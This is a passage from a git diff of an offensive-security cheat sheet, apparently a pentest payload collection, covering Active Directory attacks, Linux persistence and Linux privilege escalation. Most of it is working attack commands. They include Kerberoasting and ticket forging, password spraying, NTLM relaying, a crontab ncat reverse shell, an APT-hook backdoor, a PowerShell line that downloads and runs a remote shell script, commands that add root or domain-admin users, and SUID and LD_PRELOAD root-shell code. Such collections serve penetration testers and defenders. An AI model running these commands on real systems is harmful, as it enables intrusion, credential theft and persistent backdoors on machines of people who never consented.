 ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
 ```
 ### PassTheTicket Golden Tickets
@@ -288,7 +425,7 @@ cat $KRB5CCNAME
 NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
-./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
+./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
 ```
 ### PassTheTicket Silver Tickets
@@ -298,11 +435,12 @@ Forging a TGS require machine accound password (key) from the KDC
 ```powershell
 Create a ticket for the service
 kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
 /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
 Then use the same steps as a Golden ticket
 misc::convert ccache ticket.kirbi
 export KRB5CCNAME=/home/user/ticket.ccache
-./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
+./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
 ```
 ### Trust Tickets
@@ -311,13 +449,69 @@ TODO
 ### Kerberoast
-```powershell
+> "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
 https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf
 https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
 https://room362.com/post/2016/kerberoast-pt1/
-./GetUserSPNS.py -request lab.ropnop.com/thoffman:Summer2017
+Any valid domain user can request a kerberos ticket for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
-(Impacket) Kerberoasting (ldap query, tgs in JTR format)
+
 ```powershell
 $ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
 ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
 --------------------  -------------  --------------------------------------------------------  -------------------  -------------------
 active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40  2018-12-03 17:11:11 
 $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c154b012c$c54c7be163ae6c323ae6b5fc45a1eacee2f4903deec785cd689f4551e023775c7e7772fe85e3fb8374ca95534d72c971ba80e8b6d4ef3c3b8439dc54031540133cbcbd5f7b39d622733d198eec594c0cd181ab4696a6ad12744d1ddd2d3e2c6dd33b4daedbc9cae75e8ff2652c80421b0fa3a61ddf2cabeea462c44e0f6d9a6436717e0621bb4e0fe8bd3cf36156b4b2f7b81d651f70baf34a0b3071858b5034b895c25a0d3c67044c849d5952c381a0078a86ae562810a93d9c7bcc8311255cc9eda35a9c4d4d43ff1cc29108056285c954f3c633332ff0cb0c9c0f1896c792b247c8d25f5dd71802728fc99bb22709337b5596ab0e2045110b0b005b03351e9f71a65b48e8259f6191ce95d4e5794846c61c3abccf0f5f72a8679fb0dc0777720f5551ad99c9c9ab0955f85ee211d40b01fcaece7868960b2063923aa0f59e17b347f3308087707e95cad54b9df8179728821cf54cb204c5c2e571d9a66c8ec40b090305aa32e90a90d25ea37be6d8f8a83c683a8b69d386f9edb970596bc56fa02971f69c7e073b8de1213d9caa75ab652e5c5b99cadace9dd7d15d1d530309ea39ca1b7c6009ae3342796a6bdea084622ee95cbade437659e37363b848bad2186e3a9f7dec66e1e496db32d55eda8fb926f057996638646dcc662ed226788ddf36304dc70eaca91b26cb7180341f417fad91117ee10212c69423abd42769cbf891b51d736ffe474899eec8df64abef319d3c6dc379f2bfda33de7c3a1a50d6ece564d4559c77f560b7506fa2f1c9af7162f1247ea35706aafffde48b8cc48b1ec8e99d99ac81dc02f55f43f9726d746383cd076e7199070ff8100846ba9dc2235e92d0c7dac1f33da5fe7901e02f0566030d7c7e02535d6a300292a04e6c32d0d74d37679c2617750f5920d9c697a30c883519bc6b5a916eec354459c7f248c783bd79c436a7e8c463a8981a9e000d21c2d00c7e8468cff0ab695cb3aa4f14f149d1fafb4d656bcd1f67b747fc4c2d648466a386774853db8d50c22df57e747085142f98f5f06191c243b9dbf671da64228364f058c7e2e53a80fdde7f6dc2f25459a09fb2583757953247c222d64f49bc12d461d2e5aa572ceba2605d7eafd6031405ee422ac35cbf041b4fd28e58d871406e053d1a806de49056791646c175bf0d2aaa19f844bfc885520e19c391702be6ae61122fceac32b689764334908a4eaf7c69974a9519ebb068a15c087955fb402416bd184fd2
 ```
 Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
 ```powershell
 .\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD
 ```
 Then crack the ticket with hashcat or john
 ```powershell
 hashcat -m 13100 -a 0 hash.txt crackstation.txt
 ./john ~/hash.txt --wordlist=rockyou.lst
 ```
 ### KRB_AS_REP Roasting
 If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
 ```powershell
 C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
 C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user
 ______        _
 (_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
 |  __  /| | | |  _ \| ___ | | | |/___)
 | |  \ \| |_| | |_) ) ____| |_| |___ |
 |_|   |_|____/|____/|_____)____/(___/
 v1.3.4
 [*] Action: AS-REP roasting
 [*] Target User            : TestOU3user
 [*] Target Domain          : testlab.local
 [*] SamAccountName         : TestOU3user
 [*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
 [*] Using domain controller: testlab.local (192.168.52.100)
 [*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
 [*] Connecting to 192.168.52.100:88
 [*] Sent 169 bytes
 [*] Received 1437 bytes
 [+] AS-REQ w/o preauth successful!
 [*] AS-REP hash:
    $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
 ```
 ### Pass-the-Hash
@@ -364,6 +558,29 @@ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
 klist
 ```
 ### Capturing and cracking NTLMv2 hashes
 If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
 ```python
 python Responder.py -I eth0
 ```
 Then crack the hash with `hashcat`
 ```powershell
 hashcat -m 5600 -a 0 hash.txt crackstation.txt
 ```
 ### NTLMv2 hashes relaying
 If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
 1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
 2. Run `python  RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
 3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
 4. Wait for a shell
 ### Dangerous Built-in Groups Usage
 AdminSDHolder
@@ -391,59 +608,73 @@ SourceName          TargetName                    TrustType      TrustDirection
 domainA.local      domainB.local                  TreeRoot       Bidirectional
 ```
-## Privilege Escalation
+### PrivExchange attack
-### PrivEsc Local Admin - Token Impersonation (RottenPotato)
+Exchange your privileges for Domain Admin privs by abusing Exchange.
 You need a shell on a user account with a mailbox.
-Binary available at : https://github.com/foxglovesec/RottenPotato
+1. Subscription to the push notification feature (using privexchange.py or powerPriv), uses the credentials of the current user to authenticate to the Exchange server.
-Binary available at : https://github.com/breenmachine/RottenPotatoNG
+    ```bash
    # https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py
    python privexchange.py -ah xxxxxxx -u xxxx -d xxxxx
-```c
+    # https://github.com/G0ldenGunSec/PowerPriv 
-getuid
+    powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016
-getprivs
+    ```
-use incognito
+
-list\_tokens -u
+2. Relay of the Exchange server authentication and privilege escalation (using ntlmrelayx from Impacket).
-cd c:\temp\
+3. Profit using secretdumps from Impacket, the user can now perform a dcsync and get another user's NTLM hash
-execute -Hc -f ./rot.exe
+    ```bash
-impersonate\_token "NT AUTHORITY\SYSTEM"
+    python secretsdump.py xxxxxxxxxx -just-dc
-```
+    ```
 Alternatively you can use the Metasploit module 
 [`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
 ### Password spraying
 Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. 
 > The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. 
 Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
 ```powershell
-Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
+root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
-Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
+root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
 Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
 ```
-### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
+Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
 Check if the patch is installed : `wmic qfe list | find "3139914"`
 ```powershell
-Powershell:
+crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
 https://www.exploit-db.com/exploits/39719/
 https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
 Binary exe : https://github.com/Meatballs1/ms16-032
 Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
 ```
-### PrivEsc Local Admin - MS17-010 (Eternal Blue)
+Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services.
 ```c
 nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 <ip_netblock>
 ```
 ### From Local Admin to Domain Admin
 ```powershell
-net user hacker2 hacker123 /add /Domain
+python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]
 net group "Domain Admins" hacker2 /add /domain
 ```
-## Documentation / Thanks to
+Using [hydra]() and [ncrack]() to target RDP services.
 ```powershell
 hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
 ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
 ```
 Most of the time the best passwords to spray are :
 - Password1
 - Welcome1
 - $Companyname1
 ## References
 * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
 * [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/)
 * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
 * [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
 * [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/)
@@ -469,3 +700,15 @@ net group "Domain Admins" hacker2 /add /domain
 * [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
 * [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
 * [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
 * [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/)
 * [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/)
 * [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
 * [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
 * [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/)
 * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/)
 * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin)
 * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
 * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
 * [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
 * [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)
 * [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/)
--- a/Resources/Linux
+++ b/Resources/Linux
@@ -1,5 +1,21 @@
 # Linux - Persistence
 ## Summary
 * [Basic reverse shell](#basic-reverse-shell)
 * [Add a root user](#add-a-root-user)
 * [Suid Binary](#suid-binary)
 * [Crontab - Reverse shell](#crontab-reverse-shell)
 * [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)
 * [Backdooring a startup service](#backdoor-a-startup-service)
 * [Backdooring a user startup file](#backdooring-an-user-startup-file)
 * [Backdooring a driver](#backdooring-a-driver)
 * [Backdooring the APT](#backdooring-the-apt)
 * [Backdooring the SSH](#backdooring-the-ssh)
 * [Tips](#tips)
 * [References](#references)
 ## Basic reverse shell
 ```bash
@@ -8,6 +24,14 @@ ncat --sctp -lvp 4242
 ncat --tcp -lvp 4242
 ```
 ## Add a root user
 ```powershell
 sudo useradd -ou 0 -g 0 john
 sudo passwd john
 echo "linuxpassword" | passwd --stdin john
 ```
 ## Suid Binary
 ```powershell
@@ -19,13 +43,15 @@ chown root:root $TMPDIR2/croissant
 chmod 4777 $TMPDIR2/croissant
 ```
-## Crontab (Reverse shell to 192.168.1.2 on port 4242)
+## Crontab - Reverse shell
 ```bash
 (crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
 ```
-## Backdooring an user's bash_rc (FR/EN Version)
+## Backdooring a user's bash_rc 
 (FR/EN Version)
 ```bash
 TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
@@ -48,9 +74,9 @@ RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
 sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
 ```
-## Backdooring an user startup file
+## Backdooring a user startup file
-Linux, write a file in  `~/.config/autostart/NOM_OF_FILE.desktop`
+Linux, write a file in  `~/.config/autostart/NAME_OF_FILE.desktop`
 ```powershell
 In : ~/.config/autostart/*.desktop
@@ -79,6 +105,14 @@ Next time "apt-get update" is done, your CMD will be executed!
 echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor
 ```
 ## Backdooring the SSH
 Add an ssh key into the `~/.ssh` folder.
 1. `ssh-keygen`
 2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys`
 3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys
 ## Tips
 Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
@@ -121,7 +155,7 @@ The following directories are temporary and usually writeable
 /dev/shm/
 ```
-## Thanks to
+## References
 * [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
 * [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)
--- a/Resources/Linux
+++ b/Resources/Linux
@@ -0,0 +1,646 @@
 # Linux - Privilege Escalation
 ## Tools
 - [LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum)
    ```powershell
    ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
    ```
 - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
 - [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker)
 - [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
 ## Summary
 * [Checklist](#checklist)
 * [Looting for passwords](#looting-for-passwords)
    * [Files containing passwords](#files-containing-passwords)
    * [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd)
    * [Last edited files](#last-edited-files)
    * [In memory passwords](#in-memory-passwords)
    * [Find sensitive files](#find-sensitive-files)
 * [Scheduled tasks](#scheduled-tasks)
    * [Cron jobs](#cron-jobs)
    * [Systemd timers](#systemd-timers)
 * [SUID](#suid)
    * [Find SUID binaries](#find-suid-binaries)
    * [Create a SUID binary](#create-a-suid-binary)
 * [Capabilities](#capabilities)
    * [List capabilities of binaries](#list-capabilities-of-binaries)
    * [Edit capabilities](#edit-capabilities)
    * [Interesting capabilities](#interesting-capabilities)
 * [SUDO](#sudo)
    * [NOPASSWD](#nopasswd)
    * [LD_PRELOAD and NOPASSWD](#ld-preload-and-passwd)
    * [Doas](#doas)
    * [sudo_inject](#sudo-inject)
 * [GTFOBins](#gtfobins)
 * [Wildcard](#wildcard)
 * [Writable files](#writable-files)
    * [Writable /etc/passwd](#writable-etcpasswd)
    * [Writable /etc/sudoers](#writable-etcsudoers)
 * [NFS Root Squashing](#nfs-root-squashing)
 * [Shared Library](#shared-library)
    * [ldconfig](#ldconfig)
    * [RPATH](#rpath)
 * [Groups](#groups)
    * [Docker](#docker)
    * [LXC/LXD](#lxclxd)
 * [Kernel Exploits](#kernel-exploits)
    * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow)
    * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
    * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
    * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper)
 ## Checklists
 * Kernel and distribution release details
 * System Information:
  * Hostname
  * Networking details:
  * Current IP
  * Default route details
  * DNS server information
 * User Information:
  * Current user details
  * Last logged on users
  * Shows users logged onto the host
  * List all users including uid/gid information
  * List root accounts
  * Extracts password policies and hash storage method information
  * Checks umask value
  * Checks if password hashes are stored in /etc/passwd
  * Extract full details for 'default' uid's such as 0, 1000, 1001 etc
  * Attempt to read restricted files i.e. /etc/shadow
  * List current users history files (i.e .bash_history, .nano_history etc.)
  * Basic SSH checks
 * Privileged access:
  * Which users have recently used sudo
  * Determine if /etc/sudoers is accessible
  * Determine if the current user has Sudo access without a password
  * Are known 'good' breakout binaries available via Sudo (i.e. nmap, vim etc.)
  * Is root's home directory accessible
  * List permissions for /home/
 * Environmental:
  * Display current $PATH
  * Displays env information
 * Jobs/Tasks:
  * List all cron jobs
  * Locate all world-writable cron jobs
  * Locate cron jobs owned by other users of the system
  * List the active and inactive systemd timers
 * Services:
  * List network connections (TCP & UDP)
  * List running processes
  * Lookup and list process binaries and associated permissions
  * List inetd.conf/xined.conf contents and associated binary file permissions
  * List init.d binary permissions
 * Version Information (of the following):
  * Sudo
  * MYSQL
  * Postgres
  * Apache
    * Checks user config
    * Shows enabled modules
    * Checks for htpasswd files
    * View www directories
 * Default/Weak Credentials:
  * Checks for default/weak Postgres accounts
  * Checks for default/weak MYSQL accounts
 * Searches:
  * Locate all SUID/GUID files
  * Locate all world-writable SUID/GUID files
  * Locate all SUID/GUID files owned by root
  * Locate 'interesting' SUID/GUID files (i.e. nmap, vim etc)
  * Locate files with POSIX capabilities
  * List all world-writable files
  * Find/list all accessible *.plan files and display contents
  * Find/list all accessible *.rhosts files and display contents
  * Show NFS server details
  * Locate *.conf and *.log files containing keyword supplied at script runtime
  * List all *.conf files located in /etc
  * Locate mail
 * Platform/software specific tests:
  * Checks to determine if we're in a Docker container
  * Checks to see if the host has Docker installed
  * Checks to determine if we're in an LXC container
 ## Looting for passwords
 ### Files containing passwords
 ```powershell
 grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
 find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
 ```
 ### Old passwords in /etc/security/opasswd
 The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.
 :warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes 
 ### Last edited files
 Files that were edited in the last 10 minutes
 ```powershell
 find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
 ```
 ### In memory passwords
 ```powershell
 strings /dev/mem -n10 | grep -i PASS
 ```
 ### Find sensitive files
 ```powershell
 $ locate password | more           
 /boot/grub/i386-pc/password.mod
 /etc/pam.d/common-password
 /etc/pam.d/gdm-password
 /etc/pam.d/gdm-password.original
 /lib/live/config/0031-root-password
 ...
 ```
 ## Scheduled tasks
 ### Cron jobs
 Check if you have access with write permission on these files.   
 Check inside the file, to find other paths with write permissions.   
 ```powershell
 /etc/init.d
 /etc/cron*
 /etc/crontab
 /etc/cron.allow
 /etc/cron.d 
 /etc/cron.deny
 /etc/cron.daily
 /etc/cron.hourly
 /etc/cron.monthly
 /etc/cron.weekly
 /etc/sudoers
 /etc/exports
 /etc/anacrontab
 /var/spool/cron
 /var/spool/cron/crontabs/root
 crontab -l
 ls -alh /var/spool/cron;
 ls -al /etc/ | grep cron
 ls -al /etc/cron*
 cat /etc/cron*
 cat /etc/at.allow
 cat /etc/at.deny
 cat /etc/cron.allow
 cat /etc/cron.deny*
 ```
 ## Systemd timers
 ```powershell
 systemctl list-timers --all
 NEXT                          LEFT     LAST                          PASSED             UNIT                         ACTIVATES
 Mon 2019-04-01 02:59:14 CEST  15h left Sun 2019-03-31 10:52:49 CEST  24min ago          apt-daily.timer              apt-daily.service
 Mon 2019-04-01 06:20:40 CEST  19h left Sun 2019-03-31 10:52:49 CEST  24min ago          apt-daily-upgrade.timer      apt-daily-upgrade.service
 Mon 2019-04-01 07:36:10 CEST  20h left Sat 2019-03-09 14:28:25 CET   3 weeks 0 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
 3 timers listed.
 ```
 ## SUID
 SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is ran, the uid will be changed by the owner one. If the file owner is `root`, the uid will be changed to `root` even if it was executed from user `bob`. SUID bit is represented by an `s`.
 ```powershell
 ╭─swissky@lab ~  
 ╰─$ ls /usr/bin/sudo -alh                  
 -rwsr-xr-x 1 root root 138K 23 nov.  16:04 /usr/bin/sudo
 ```
 ### Find SUID binaries
 ```bash
 find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
 find / -uid 0 -perm -4000 -type f 2>/dev/null
 ```
 ### Create a SUID binary
 ```bash
 print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c   
 gcc -o /tmp/suid /tmp/suid.c  
 sudo chmod +x /tmp/suid # execute right
 sudo chmod +s /tmp/suid # setuid bit
 ```
 ## Capabilities
 ### List capabilities of binaries 
 ```bash
 ╭─swissky@lab ~  
 ╰─$ /usr/bin/getcap -r  /usr/bin
 /usr/bin/fping                = cap_net_raw+ep
 /usr/bin/dumpcap              = cap_dac_override,cap_net_admin,cap_net_raw+eip
 /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
 /usr/bin/rlogin               = cap_net_bind_service+ep
 /usr/bin/ping                 = cap_net_raw+ep
 /usr/bin/rsh                  = cap_net_bind_service+ep
 /usr/bin/rcp                  = cap_net_bind_service+ep
 ```
 ### Edit capabilities
 ```powershell
 /usr/bin/setcap -r /bin/ping            # remove
 /usr/bin/setcap cap_net_raw+p /bin/ping # add
 ```
 ### Interesting capabilities
 Having the capability =ep means the binary has all the capabilities.
 ```powershell
 $ getcap openssl /usr/bin/openssl 
 openssl=ep
 ```
 Alternatively the following capabilities can be used in order to upgrade your current privileges.
 ```powershell
 cap_dac_read_search # read anything
 cap_setuid+ep # setuid
 ```
 Example of privilege escalation with `cap_setuid+ep`
 ```powershell
 $ sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7
 $ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
 sh-5.0# id
 uid=0(root) gid=1000(swissky)
 ```
 ## SUDO
 ### NOPASSWD
 Sudo configuration might allow a user to execute some command with another user privileges without knowing the password.
 ```bash
 $ sudo -l
 User demo may run the following commands on crashlab:
    (root) NOPASSWD: /usr/bin/vim
 ```
 In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`.
 ```bash
 sudo vim -c '!sh'
 sudo -u root vim -c '!sh'
 ```
 ### LD_PRELOAD and NOPASSWD
 If `LD_PRELOAD` is explicitly defined in the sudoers file
 ```powershell
 Defaults        env_keep += LD_PRELOAD
 ```
 Compile the following C code with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
 ```powershell
 #include <stdio.h>
 #include <sys/types.h>
 #include <stdlib.h>
 void _init() {
 	unsetenv("LD_PRELOAD");
 	setgid(0);
 	setuid(0);
 	system("/bin/sh");
 }
 ```
 Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=/tmp/shell.so find`
 ### Doas
 There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf`
 ```bash
 permit nopass demo as root cmd vim
 ```
 ### sudo_inject
 Using [https://github.com/nongiach/sudo_inject](https://github.com/nongiach/sudo_inject)
 ```powershell
 $ sudo whatever
 [sudo] password for user:    
 # Press <ctrl>+c since you don't have the password. 
 # This creates an invalid sudo tokens.
 $ sh exploit.sh
 .... wait 1 seconds
 $ sudo -i # no password required :)
 # id
 uid=0(root) gid=0(root) groups=0(root)
 ```
 Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf)
 ## GTFOBins
 [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
 The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
 > gdb -nx -ex '!sh' -ex quit    
 > sudo mysql -e '\! /bin/sh'    
 > strace -o /dev/null /bin/sh    
 > sudo awk 'BEGIN {system("/bin/sh")}'
 ## Wildcard
 By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that's where the wildcard comes in handy.
 ```powershell
 # create file for exploitation
 touch -- "--checkpoint=1"
 touch -- "--checkpoint-action=exec=sh shell.sh"
 echo "#\!/bin/bash\ncat /etc/passwd > /tmp/flag\nchmod 777 /tmp/flag" > shell.sh
 # vulnerable script
 tar cf archive.tar *
 ```
 Tool: [wildpwn](https://github.com/localh0t/wildpwn)
 ## Writable files
 List world writable files on the system.
 ```powershell
 find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
 find / -perm -2 -type f 2>/dev/null
 find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
 ```
 ### Writable /etc/passwd
 First generate a password with one of the following commands.
 ```powershell
 openssl passwd -1 -salt hacker hacker
 mkpasswd -m SHA-512 hacker
 python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
 ```
 Then add the user `hacker` and add the generated password.
 ```powershell
 hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash
 ```
 E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
 You can now use the `su` command with `hacker:hacker`
 Alternatively you can use the following lines to add a dummy user without a password.    
 WARNING: you might degrade the current security of the machine.
 ```powershell
 echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
 su - dummy
 ```
 NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. 
 ### Writable /etc/sudoers
 ```powershell
